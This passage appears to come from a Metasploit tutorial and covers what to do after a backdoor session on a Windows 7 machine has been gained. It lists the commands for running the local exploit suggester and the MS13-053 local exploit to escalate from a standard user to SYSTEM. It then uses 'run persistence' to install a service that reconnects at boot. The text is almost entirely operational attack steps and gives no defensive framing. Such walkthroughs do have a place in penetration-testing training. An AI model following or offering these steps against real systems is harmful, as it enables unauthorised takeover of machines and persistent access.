When you have completed step 1 – 3 we have a situation where we have a backdoor connection to a windows 7 machine, under a standard user account. Now it’s time to see if we can get admin by using an exploit.
run this command from the meterpreter console:
use post/multi/recon/local_exploit_suggester
show options
set session 1
run
this script checks on the windows 7 machine which possible local privilege escalation methods will succeed, very handy for a fast intervention.
Let’s try this one:
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-053
use exploit/windows/local/ms13_053_schlamperei
set session 1
exploit
You’ll see that there is a new session created (verify this by sessions -l)
connect to your new backdoor session by using sessions -i <newID> and after connection type
getuid
Is everything is correct you will see that you are SYSTEM on the windows 7 machine. Of course you want to have this forever, you can use the command
run persistence
this will install a service which will connect when the system starts.